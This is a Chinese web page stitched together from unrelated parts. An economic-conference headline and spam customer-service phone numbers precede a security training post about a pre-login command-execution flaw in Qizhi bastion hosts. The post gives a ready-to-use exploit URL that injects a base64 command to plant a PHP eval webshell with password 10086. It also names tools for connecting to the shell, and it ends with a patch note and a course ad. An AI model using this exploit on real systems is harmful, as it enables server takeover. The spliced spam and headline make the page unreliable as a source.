七图读懂经济工作会议,2019要干好这些事

  • 时间:
  • 浏览:259813

通联支付pos机公司客服电话~总部服务中心✅【☎; 0216-0556-920 人工客服】【☎; 0216-0556-727】✅咨询、还款、事物处理、投诉、退货、查询、...█HdhdsjsbS20201025 全台联向列车出轨变伤乡亲同胞表达悼念和慰问

  

现在HVV如火如荼进行中,接下来给给各位小伙伴带来本次HVV中某个漏洞的播报(规则说明),以后每天会定时播报HVV中的漏洞及相关资讯,关注东塔小姐姐不迷路?

各位小伙伴,大家都知道堡垒机主要是干什么的吗?在网络中处于什么位置吗?今天我们一起来简单了解一下,并介绍在本次HVV中出现的堡垒机漏洞和利用方法。

堡垒机,即在一个特定的网络环境下,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为,以便集中报警、及时处理及审计定责。

本次HVV,红队利用其中一家堡垒机的漏洞,利用现有的EXP(什么是EXP,小伙伴自己去查询一下喔),可直接获取服务器权限,以下为该堡垒机漏洞的详细描述。

齐治堡垒机2019年6月份之前的运维堡垒机系统存在 “前台远程命令执行漏洞”(CNVD-2019-20835),攻击者可利用该漏洞获取服务器权限。

本漏洞触发完全不需要登录到系统即可执行;

这里假设10.20.10.10为堡垒机的IP地址:

1.访问 http://10.20.10.11/listener/cluster_manage.php :返回 "OK".

2.访问如下链接即可getshell,执行成功后,生成PHP一句话马

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

3yidianzixun/article/var/www/shterm/resources/qrcode/lbj77.php 密码10086

其中绿色代码部分是base64加密,需要解码,解码后如下所示

转码的截图

分析:上述是PHP中经典的危险函数eval的用法,传递参数为10086,采用GET或者POST传递参数都可以,对应的WebShell的路径为

/var/www/shterm/resources/qrcode/lbj77.php,直接利用菜刀、蚁剑等工具连接即可。

该漏洞的修复补丁已发布,如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。更新至最新版本。

如果你不太懂网络安全行业该怎么入门?或者说你觉得想要完全了解入门网络安全所需要的知识是有一定难度的,那东塔小姐姐非常推荐你学习7天渗透测试体验营,现在限时特价9.9元。特训营课程于9月21日开课,为期七天。名额有限,心动的话,就快快报名参加哟

东塔安全学院在各大平台均上线了各项活动和学习内容,快快登录以下各大平台,搜索下面“关键词”学习起来吧

微博:东塔学院

免费学习资料 免费学习课程

等你来领取

【编辑:半月谈】